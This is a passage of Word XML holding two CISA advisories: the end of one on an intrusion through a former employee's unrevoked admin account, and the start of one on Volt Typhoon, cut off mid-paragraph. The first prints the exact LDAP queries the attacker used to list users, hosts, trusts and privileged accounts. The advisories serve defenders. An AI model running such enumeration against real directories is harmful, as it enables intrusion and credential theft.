        <w:t>cloud artifacts, Untitled Goose Tool supports incident response teams with environments that do not ingest logs into a security information and event management (SIEM) tool. Threat Actor Activity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logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim's on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim's VPN [T1133] with the intent to blend in with legitimate traffic to evade detection. Initial Access: Compromised Domain Accounts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USER1: The threat actor gained initial access through the compromised account of a former employee with administrative privileges (USER1) [T1078.002] to conduct reconnaissance and discovery activities. The victim organization confirmed that this account was not disabled immediately following the employee's departure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The threat actor likely obtained the USER1 account credentials in a separate data breach due to the credentials appearing in publicly available channels containing leaked account information [T1589.001].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>USER1 had access to two virtualized servers including SharePoint and the workstation of the former employee. The workstation was virtualized from a physical workstation using the Veeam Physical to Virtual (P2V) function within the backup software.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USER2: The threat actor likely obtained the USER2 account credentials from the virtualized SharePoint server managed by USER1 [T1213.002]. The victim confirmed that the administrator credentials for USER2 were stored locally on this server [T1552.001].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Through connection from the VM, the threat actor authenticated to multiple services [T1021] via the USER1 account, as well as from an additional compromised global domain administrator account (USER2) [T1078.002]. The threat actor's use of the USER2 account was impactful due to the access it granted to both the on-premises AD and Azure AD [T1021.007], thus enabling administrative privileges [T1078.004].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Following notification of the dark web posting, the victim organization immediately disabled the USER1 account and took the two virtualized servers associated with the former employee offline. The victim also changed the password for the USER2 account and removed administrator privileges. Neither of the administrative accounts had multifactor authentication (MFA) enabled. LDAP Queries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Through connection from the VM, the threat actor conducted LDAP queries of the AD, likely using the open source tool AdFind.exe, based on the format of the output. CISA and MS-ISAC assess the threat actor executed the LDAP queries [T1087.002] to collect user, host [T1018], and trust relationship information [T1482]. It is also believed the LDAP queries generated the text files the threat actor posted for sale on the dark web brokerage site: ad_users.txt, ad_computers.txt, and trustdmp.txt.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 lists all queries that were conducted between 08:39:43-08:40:56 Coordinated Universal Time (UTC). Table 1: LDAP Queries Conducted by the Threat Actor Query Description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LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)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Collects names and metadata of users in the domain.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LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)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Collects names and metadata of hosts in the domain.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LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted- Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)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Collects trust information in the domain.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LDAP Search Scope: WholeSubtree, Base Object: DC=[REDACTED],DC=local, Search Filter: ( &amp; ( &amp; (sAMAccountType=805306368) (servicePrincipalName=*) ( ! (sAMAccountName=krbtgt) ) ( ! (userAccountControl&amp;2) ) ) (adminCount=1) )</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Collects Domain Administrators and Service Principals in the domain. Service Authentication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Through the VM connection, the threat actor was observed authenticating to various services on the victim organization's network from the USER1 and USER2 administrative accounts. In all instances, the threat actor authenticated to the Common Internet File Service (CIFS) on various endpoints [T1078.002],[T1021.002]-a protocol used for providing shared access to files and printers between machines on the network. This was likely used for file, folder, and directory discovery [T1083], and assessed to be executed in an automated manner.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>USER1 authenticated to four services, presumably for the purpose of network and service discovery [T1046].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>USER2 authenticated to twelve services. Note: This account had administrative privileges to both the on-premises network and Azure tenant. MITRE ATT&amp;CK TACTICS AND TECHNIQUES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See Tables 2-9 for all referenced threat actor's tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Table 2: Reconnaissance Technique Title ID Use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Gather Victim Identity Information: Credentials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T1589.001</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actor likely gathered USER1 account credentials in a data breach where account information appeared in publicly available channels. Table 3: Initial Access Technique Title ID Use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Valid Accounts: Domain Accounts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T1078.002</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actor gained initial access through the compromised account of a former employee with administrative privileges (USER1). The employee's account was not immediately disabled after their departure. Table 4: Persistence Technique Title ID Use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External Remote Services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T1133</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actor connected a VM via the victim's VPN to blend in with legitimate traffic to evade detection. Table 5: Privilege Escalation Technique Title ID Use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Valid Accounts: Domain Accounts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T1078.002</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actor authenticated to multiple services from a compromised Global Domain Administrator account (USER2). The actor also authenticated to the Common Internet File Service (CIFS) on various endpoints.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Valid Accounts: Cloud Accounts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T1078.004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actor used a compromised account (USER2) which was synced to both the on-premises AD and Azure AD, thus enabling administrative privileges to both the on-premises network and Azure tenant. Table 6: Credential Access Technique Title ID Use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Unsecured Credentials: Credentials in Files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T1552.001</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actor likely obtained USER2 account credentials from the virtualized SharePoint server where they were locally stored. Table 7: Discovery Technique Title ID Use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Account Discovery: Domain Account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T1087.002</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Through the VM connection, the actor executed LDAP queries of the AD.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Remote System Discovery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T1018</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Through the VM connection, the actor executed LDAP queries to collect user and host information.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Domain Trust Discovery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T1482</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Through the VM connection, the actor executed LDAP queries to collect trust relationship information.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File and Directory Discovery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T1083</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actor authenticated to the CIFS on various endpoints likely for the purpose of file, folder, and directory discovery.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Network Service Discovery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T1046</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actor used the compromised USER1 account to authenticate to four services, presumably for the purpose of network and service discovery. Table 8: Lateral Movement Technique Title ID Use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Remote Services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T1021</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actor connected from an unknown VM and authenticated to multiple services via the USER1 account.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Remote Services: Cloud Services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T1021.007</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actor used the USER2 account, which granted access to the Azure AD, as well as the on-premises AD.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Remote Services: SMB/Windows Admin Shares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T1021.002</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actor used compromised accounts to interact with a remote network share using Server Message Block. Table 9: Collection Technique Title ID Use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Data from Information Repositories: SharePoint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T1213.002</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actor likely obtained the USER2 account credentials from the virtualized SharePoint server managed by USER1. MITIGATIONS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Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST), which apply to all critical infrastructure organizations and network defenders. The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Secure and Monitor Administrator Accounts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The threat actor gained access to the network via compromised administrator accounts that did not have MFA enabled. The compromised USER2 Global Domain Administrator account could have enabled the threat actor to move laterally from the on-premises environment to the Azure tenant. In response to the incident, the victim organization removed administrator privileges for USER2. Additionally, the victim organization disabled unnecessary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>administrator accounts and enabled MFA for all administrator accounts. To prevent similar compromises, CISA and MS-ISAC recommend the following: Review current administrator accounts to determine their necessity and only maintain administrator accounts that are essential for network management. This will reduce the attack surface and focus efforts on the security and monitoring of necessary accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict the use of multiple administrator accounts for one user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create separate administrator accounts for on-premises and Azure environments to segment access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement the principle of least privilege to decrease threat actor's ability to access key network resources. Enable just-in-time and just enough access for administrator accounts to elevate the minimum necessary privileges for a limited time to complete tasks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use phishing-resistant multifactor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible-particularly for webmail and VPNs-for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit CISA's More than a Password webpage and read CISA's Implementing Phishing-Resistant MFA fact sheet. Reduce Attack Surface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Unnecessary accounts, software, and services in the network create additional vectors for a threat actor to compromise. CISA and MS-ISAC recommend the following: Establish policy and procedure for the prompt removal of unnecessary accounts and groups from the enterprise, especially privileged accounts. Organizations should implement a robust and continuous user management process to ensure accounts of offboarded employees are removed and can no longer access the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Determine the need and functionality of assets that require public internet exposure [CPG 1.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Follow a routine patching cycle for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict personal devices from connecting to the network. Personal devices are not subject to the same group policies and security measures as domain joined devices. Evaluate Tenant Settings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default, in Azure AD all users can register and manage all aspects of applications they create. Users can also determine and approve what organizational data and services the application can access. These default settings can enable a threat actor to access sensitive information and move laterally in the network. In addition, users who create an Azure AD automatically become the Global Administrator for that tenant. This could allow a threat actor to escalate privileges to execute malicious actions. CISA and MS-ISAC recommend the following: Evaluate current user permissions in the Azure tenant to restrict potentially harmful permissions including: Restrict users' ability to register applications. By default, all users in Azure AD can register and manage the applications they create and approve the data and services the application can access. If this is exploited, a threat actor can access sensitive information and move laterally in the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict non-administrators from creating tenants. Any user who creates an Azure AD automatically becomes the Global Administrator for that tenant. This creates an opportunity for a threat actor to escalate privileges to the highest privileged account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict access to the Azure AD portal to administrators only. Users without administrative privileges cannot change settings, however, they can view user info, group info, device details, and user privileges. This would allow a threat actor to gather valuable information for malicious activities. Create a Forensically Ready Organization Collect access- and security-focused logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and virtual private network) for use in both detection and incident response activities [CPG 2.T].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable complete coverage of tools, including Endpoint Detection and Response (EDR), across the environment for thorough analysis of anomalous activity and remediation of potential vulnerabilities. Assess Security Configuration of Azure Environment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CISA created the Secure Cloud and Business Applications (SCuBA) assessment tool to help Federal Civilian Executive Branch (FCEB) agencies to verify that a M365 tenant configuration conforms to a minimal viable secure configuration baseline. Although the SCuBA assessment tool was developed for FCEB, other organizations can benefit from its output. CISA and MS-ISAC recommend the following: Use tools that identify attack paths. This will enable defenders to identify common attack paths used by threat actors and shut them down before they are exploited.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review the security recommendations list provided by Microsoft 365 Defender. Focus remediation on critical vulnerabilities on endpoints that are essential to mission execution and contain sensitive data. Evaluate Conditional Access Policies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Conditional access policies require users who want to access a resource to complete an action. Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review current conditional access policies to determine if changes are necessary. Reset All Passwords and Establish Secure Password Policies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In response to the incident, the victim organization reset passwords for all users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as user passwords expire [CPG 2.A],[CPG 2.B],[CPG 2.C].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Store credentials in a secure manner, such as with a credential manager, vault, or other privileged account management solution [CPG 2.L].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For products that come with default passwords, ask vendors how they plan to eliminate default passwords, as highlighted in CISA's Secure by Design Alert: How Manufacturers Can Protect Customers by Eliminating Default Passwords. Mitigations for Vendors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CISA recommends that vendors incorporate secure by design principles and tactics into their practices, limiting the impact of threat actor techniques and strengthening the secure posture for their customers. Prioritize secure by default configurations, such as eliminating default passwords and providing high-quality audit logs to customers with no additional configuration, at no extra charge. Secure by default configurations should be prioritized to eliminate the need for customer implementation of hardening guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Immediately identify, mitigate, and update affected products that are not patched in accordance with CISA's Known Exploited Vulnerabilities (KEV) catalog.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement multifactor authentication (MFA), ideally phishing-resistant MFA, as a default (rather than opt-in) feature for all products. VALIDATE SECURITY CONTROLS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addition to applying mitigations, CISA and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see table 2-9). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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CISA and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. RESOURCES MS-ISAC: Center for Internet Security (CIS) Cyber-Attack Defense: CIS Benchmarks + CDM + MITRE ATT&amp;CK REFERENCES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 CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments DISCLAIMER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information in this report is being provided "as is" for informational purposes only. CISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC. VERSION HISTORY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February 15, 2024: Initial version.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.02.15 23:54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-046a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure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Release Date February 07, 2024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Alert Code AA24-038A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Nation-State Cyber Actors, Critical Infrastructure Security and Resilience, Cyber Threats and Advisories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Actions to take today to mitigate Volt Typhoon activity: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Apply patches for internet-facing systems. Prioritize patching critical vulnerabilities in appliances known to be frequently exploited by Volt Typhoon.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement phishing-resistant MFA.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure logging is turned on for application, access, and security logs and store logs in a central system.</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SUMMARY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The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) assess that People's Republic of China (PRC) state-sponsored cyber actors are seeking to pre-position themselves on IT networks for disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States.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CISA, NSA, FBI and the following partners are releasing this advisory to warn critical infrastructure organizations about this assessment, which is based on observations from the U.S. authoring agencies' incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus): U.S. Department of Energy (DOE) U.S. Environmental Protection Agency (EPA) U.S. Transportation Security Administration (TSA) Australian Signals Directorate's (ASD's) Australian Cyber Security Centre (ACSC) Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment (CSE) United Kingdom National Cyber Security Centre (NCSC-UK) New Zealand National Cyber Security Centre (NCSC-NZ)</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authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations-primarily in Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors-in the continental and non- continental United States and its territories, including Guam. Volt Typhoon's choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions. The U.S. authoring agencies are concerned about the potential for these actors to use their network access for disruptive effects in the event of potential geopolitical tensions and/or military conflicts. CCCS assesses that the direct threat to Canada's critical infrastructure from PRC state-sponsored actors is likely lower than that to U.S. infrastructure, but should U.S. infrastructure be disrupted, Canada would likely be affected as well, due to cross-border integration. ASD's ACSC and NCSC-NZ assess Australian and New Zealand critical infrastructure, respectively, could be vulnerable to similar activity from PRC state-sponsored actors.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As the authoring agencies have previously highlighted, the use of living off the land (LOTL) techniques is a hallmark of Volt Typhoon actors' malicious cyber activity when targeting critical infrastructure. The group also relies on valid accounts and leverage strong operational security, which combined, allows for long-term undiscovered persistence. In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years. Volt Typhoon actors conduct extensive pre- exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim's environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise.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authoring agencies urge critical infrastructure organizations to apply the mitigations in this advisory and to hunt for similar malicious activity using the guidance herein provided, along with the recommendations found in joint guide Identifying and Mitigating Living Off the Land Techniques. These mitigations are primarily intended for IT and OT administrators in critical infrastructure organizations. Following the mitigations for prevention of or in response to an incident will help disrupt Volt Typhoon's accesses and reduce the threat to critical infrastructure entities.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If activity is identified, the authoring agencies strongly recommend that critical infrastructure organizations apply the incident response recommendations in this advisory and report the incident to the relevant agency (see Contact Information section).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additional information, see joint advisory People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection and U.S. Department of Justice (DOJ) press release U.S. Government Disrupts Botnet People's Republic of China Used to Conceal Hacking of Critical Infrastructure. For more information on PRC state-sponsored malicious cyber activity, see CISA's China Cyber Threat Overview and Advisories webpage.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Download the PDF version of this report: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AA24-038A PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure (PDF, 1.56 MB )</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Read the accompanying Malware Analysis Report: MAR-10448362-1.v1 Volt Typhoon.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a downloadable copy of indicators of compromise (IOCs), see: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AR24-038A STIX JSON (JSON, 59.40 KB ) TECHNICAL DETAILS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Note: This advisory uses the MITRE ATT&amp;CK for Enterprise framework, version 14. See Appendix C: MITRE ATT&amp;CK Tactics and Techniques section for tables of the Volt Typhoon cyber threat actors' activity mapped to MITRE ATT&amp;CK(R) tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Overview of Activity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May 2023, the authoring agencies-working with industry partners- disclosed information about activity attributed to Volt Typhoon (see joint advisory People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection). Since then, CISA, NSA, and FBI have determined that this activity is part of a broader campaign in which Volt Typhoon actors have successfully infiltrated the networks of critical infrastructure organizations in the continental and non-continental United States and its territories, including Guam.</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The U.S. authoring agencies have primarily observed compromises linked to Volt Typhoon in Communications, Energy, Transportation Systems, and Water and Wastewater Systems sector organizations' IT networks. Some </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>victims are smaller organizations with limited cybersecurity capabilities that provide critical services to larger organizations or key geographic locations.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 actors tailor their TTPs to the victim environment; however, the U.S. authoring agencies have observed the actors typically following the same pattern of behavior across identified intrusions. Their choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre- positioning themselves on IT networks to enable the disruption of OT functions across multiple critical infrastructure sectors (see Figure 1). Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization's network architecture and operational protocols. This reconnaissance includes identifying network topologies, security measures, typical user behaviors, and key network and IT staff. The intelligence gathered by Volt Typhoon actors is likely leveraged to enhance their operational security. For example, in some instances, Volt Typhoon actors may have abstained from using compromised credentials outside of normal working hours to avoid triggering security alerts on abnormal account activities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Volt Typhoon typically gains initial access to the IT network by exploiting known or zero-day vulnerabilities in public-facing network appliances (e.g., routers, virtual private networks [VPNs], and firewalls) and then connects to the victim's network via VPN for follow-on activities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Volt Typhoon aims to obtain administrator credentials within the network, often by exploiting privilege escalation vulnerabilities in the operating system or network services. In some cases, Volt Typhoon has obtained credentials insecurely stored on a public-facing network appliance. Volt Typhoon uses valid administrator credentials to move laterally to the domain controller (DC) and other devices via remote access services such as Remote Desktop Protocol (RDP).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
